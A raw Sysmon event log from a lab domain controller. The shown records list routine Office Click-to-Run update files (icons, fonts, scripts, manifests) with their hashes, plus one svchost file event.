Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-backarrow-rtl@2x.pngMD5=102BC63E19168FC75A4C089F99C8955F,SHA256=24402D6782A3A7A8D6BAC75683E00B4CDF3FCB2F8D2F0991446E484241992DD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-backarrow-rtl.pngMD5=86D421266F89530A3A8C44BB8D988053,SHA256=856F875A89451B551E97AF0346E2EBD23749B2634C4ADA0FF398F8AF865D2FBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-backarrow-rtl-dark@4x.pngMD5=F08D3D5F9C504EA21FFD441DAB43D4A6,SHA256=12CB9248B78329FBD65440521EC99353A41361523AC494F86B77BDF695E708DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-backarrow-rtl-dark@3x.pngMD5=CD5731AF20AD605F33B57CD7AA3092C0,SHA256=2A4B82C1F6A1E40A4BE1265B20B405D5F4CB1F2242BC66E27C0CB926C2E9D1CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-backarrow-rtl-dark@2x.pngMD5=66993B02E4D806D10907B5173B17C92C,SHA256=FEB3B8076487328FF4B520030EE0AB10BAA07B12B53403DA2C454C2F62B6EAED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-backarrow-rtl-dark.pngMD5=7426D0B394F4648CCD6A498B1DB397E9,SHA256=DCD845BE4E40CEE1389AB474F5566718F8B681DE9AAE4A256ABF3D8B9DC58C2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-backarrow-dark@4x.pngMD5=EB3F5B0E5136E05F1B33C6A94EAFFE59,SHA256=51853E49B5E23D7964BD10746E4C4C3E3C9E38CF16DE4CC98C9A1F831B9CF6C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-backarrow-dark@3x.pngMD5=4DFD16B26D52725605C53EA4369BDD78,SHA256=063810396D3149146BE49C6D7BE14736ADE6CB1BA42B11C08DC0951E2887EDA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-backarrow-dark@2x.pngMD5=D48E78A9152CB3BE05237544FC76CA43,SHA256=80360913590254A1A3CD0034AABBAA40E6FDE89F6D8122239BD621913ADBEAFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000018\assets\src\assets\sdx-cardview-backarrow-dark.pngMD5=0A54FAC59F6615B59E8C5B15B8980B80,SHA256=3387541A2E954917922612B117A6219774333513B48D05C7CE3C4A873176ED6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\urlmap.iniMD5=687E906945214956ED35B9A3CE39FDF3,SHA256=9D6F81198E51CF11DB42C9C2877F75E87D6D9F82A170FD9BE3F38A594B0A6F5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\TranslateIcon32x32_1f2d44713f9f6ab18d3b456732a6cd5c.pngMD5=8F3AFA12B900AE59CC14AD46F94FC930,SHA256=57615343CB5DEC0E2A792C544AC8C98C191251FE09A14A082C847321E3B22F14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\manifest.xmlMD5=BC0DDB2C50D556846E0AC1BFF019194F,SHA256=168DE91317D5E6D0A8A03BA15F2ECEA79DA3D75A611C912719B0D4350D8CE65A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\word-win32-16.01_ed80d9cc3e5e16021558d5eb7a01e861.jsMD5=B2D871C75DCD992716974A93F839900A,SHA256=E637A277BAFCD8DFEE4C8752B336B4F43308C717498A15FAD8C4E5EE2FD53B5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\urlmap.iniMD5=687E906945214956ED35B9A3CE39FDF3,SHA256=9D6F81198E51CF11DB42C9C2877F75E87D6D9F82A170FD9BE3F38A594B0A6F5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\TranslateIcon64x64_4a1bd8d712f9ec5f0da0b0e389dfdc1d.pngMD5=0C675E7E6B1E3F1ED30758CDC3B5ACD6,SHA256=377EA076CA783F1FACC7E0B49761DDBAE0E8391B951D2A7A66C4E09E80EACA2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\TranslateIcon32x32_1f2d44713f9f6ab18d3b456732a6cd5c.pngMD5=8F3AFA12B900AE59CC14AD46F94FC930,SHA256=57615343CB5DEC0E2A792C544AC8C98C191251FE09A14A082C847321E3B22F14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\transition.min_a0b28cf457c0dd6e141c9c00e504b0de.cssMD5=484A4DCAC16847D00A87231E4C41E074,SHA256=FF4DC5C2FF1EA5E5A340B1367EFE3A2A5A73ACCD1E5DEB69D8A84BB5FF29B899,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\segoeui-semilight_b5b989eb23ca971f099562b180324310.woffMD5=897F07BB31E3216CBF844B2C09E2CDE5,SHA256=D80D802E75F507EEDF21E356E97486E64D3E95AB39D05C6EA8C8DE72269CDA8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\segoeui-semibold_adf3bdddb5e8fdd95786966de9f5c041.woffMD5=6B8D94EE3B0185FEAAFE1F19E9587F1F,SHA256=D3C4759FF3ACE9D0C256C41D8023F87937D09910B727976A9E849122AD433522,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\segoeui-regular_b37aeac7678a117d1c8465480715a4b8.woffMD5=8E5BEAEBB27BBF92146977BD1062EB11,SHA256=D79AD533ADF61E76CD74AB32D3D2F53AE11F50360F2F7C95613E4D23787502A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\segoeui-light_4b1c012d11ad79108a2eef4959135ba5.woffMD5=E48EA1AC1846A2E80CB60F9A23494A50,SHA256=A44F35560504D57DA16A54F02B58F02E1873E9F2FF905941E20573F24AE8A7A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\react.min_f22492ae996884949f5f0e0204796add.jsMD5=0DEDF3475B2F1E2D7DA6BFB3D8FFDA4B,SHA256=F7EBD2A9AAE0DBD4A44593E01EA1A16A4E9F0270135377C43E4375630FA2DB9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\react-dom.min_27a8068f7845b22ea825b6827cfd2b10.jsMD5=5EBC6EAE0A9381D2B4F7226884014CAE,SHA256=B29F279FD0328476A46B189BCEA42C22CB85FDF350E940E1C0938C00444CB31B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\powerpoint-win32-16.01_2c90016cf355d77927ea709f3a928ff1.jsMD5=CBE02973A9D28731FE2D352AE2F2E3BB,SHA256=2B5CC3E26CE6104D16BAD4D3354907ACE7615F602B0918DB0144602A839A42B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\override-onenote_6338dc399ce9c5ca929aed55065c4a07.cssMD5=45992DE745D6D37E59B789A17D27AB7E,SHA256=51016E5295A2147AE3DB8FC31FEBFBE761BF7B51D3137459DB23B7152A133102,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\override-mac_f76168c82308f7c9849fd2840fe8d259.cssMD5=9F8BD181B137B4A8F5AB52CA6D238797,SHA256=A6491037CE2EE3D596A9B0A430D7911D5E7CF4B81AF32BEED4043B19762D99F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\oteljs_e579e36d1615cd8aaca470d9521db7dc.jsMD5=058417DAFB7ECA253C26134BBE030137,SHA256=585F8B00B6E1A2175360E7D991A1A2D60AE135DF2482034A7F7CBFBE10A62B52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\oteljs_agave_1dc45f7a7be81b74944d97fb2754ebde.jsMD5=ABD7110EF0E4C2F7F8900CA2F1E46431,SHA256=8D8426CC48710988BD62EF3BA4148103C719F4B3CE40A3407BC6E3FB597DA825,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\office_strings_247f8f78dd7820085808b5e8fec39119.jsMD5=6DAE09CF02392A81E6E6EC201C1E4703,SHA256=960F8EB4DD53639D78CAFC1C92D9F51BA5CFE1FC77F69BF0DE31D93A6CE12CC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\office_2e97d65336bd5d3533e966e9de09077e.jsMD5=145C4755DE2815B6B4AED1F0A3909765,SHA256=53006D3434A0F5C6B4300A8560D5244ED54393CF347C22A45BF731A4C2FA9563,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\o15apptofilemappingtable_0adea789fd8b78dd36198df126e1d6b4.jsMD5=D37774BA8CB4B31CD21B5726E256A6CD,SHA256=2490429F5D9BAC55D691CB2CA5A080C4121C3554FD7646264C7336ED3D3EEB6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\MSLogo_309b8bcb733f64e790ff5eaa74076fa9.pngMD5=9F14C20150A003D7CE4DE57C298F0FBA,SHA256=112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\jquery.min_a9aa74d836a33524bde3e897ad35f5f9.jsMD5=475F3BDF8D1211C09E8B8F1D83539D27,SHA256=E83C17BAFCC92FEDCFD3A0D452D05FB176D1BF87A5FAC78F89C400E11D82E00C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\index_8ceba61edb30c637224d774a3b44d863.jsMD5=8CEDB3778DEE52D4E431E79096F5B44F,SHA256=729C1737CAE735C2C08689A3D9F704296BABC003E236F72BD7A1B074F52AA895,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.392{A7A01FEF-B626-607E-1000-00000000BB01}1168NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=95B0858163F273D189026D0F25A85729,SHA256=A9F94BD9A2FBB418A0F87564685F78660829B489AD70F2D91B676DF0B3AAAF61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\index_4c9490dec8f0360011c7fa0a50ae6d8c.htmlMD5=ACB69491DB3350076FEECFE1A0596160,SHA256=72B84A6DD88F98BD391A3459ADE6C923AD36432A060A3E0A14D5D6644BB53997,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\index_0f04b91d96ac2a62fd94dba0e48647d7.cssMD5=FA4DFFABD477012616505352CDF8215D,SHA256=45330B116034BE9240CD96F043AA266950EB0A39640FDFC44B184A684BA676ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\fabricmdl2icons-2.38_7902e1ad6fae63779becd982d55fc755.woffMD5=49177F093B8DF96169AE05E30C057494,SHA256=B04F780EB91FB9B361EBE091D58C499333DBA57648E1ECC9C85678387178F64E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.376{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\excel-win32-16.01_300069b6e101288c1fd6b41b0047e111.jsMD5=7F4C7590143824F39B477DA4D3293C41,SHA256=39000223D2349C723BC4C6DD4ED44D3D6F6D9CCA2874AB2BAB9E426169AEBB8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\dropdown.min_ee47ece9d48d13a62b12e60120b51d46.cssMD5=1D5F97FA8AF469FD21BD1183EF820450,SHA256=21658C00C91C14B9DEA0BE1D5962E19C13779F5E6B40FD62724A061C6399C45D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:25.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\sdxs\FA000000002\OfflineFiles\aria-web-telemetry_2f887958b7dac9ae6002b7a964a7a86c.jsMD5=AB160CBC15A05701D835200E65385636,SHA256=4B01583F47575A9B732D2CB98E019066E540F653CAE5DB198FB45E19B9E3A860,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 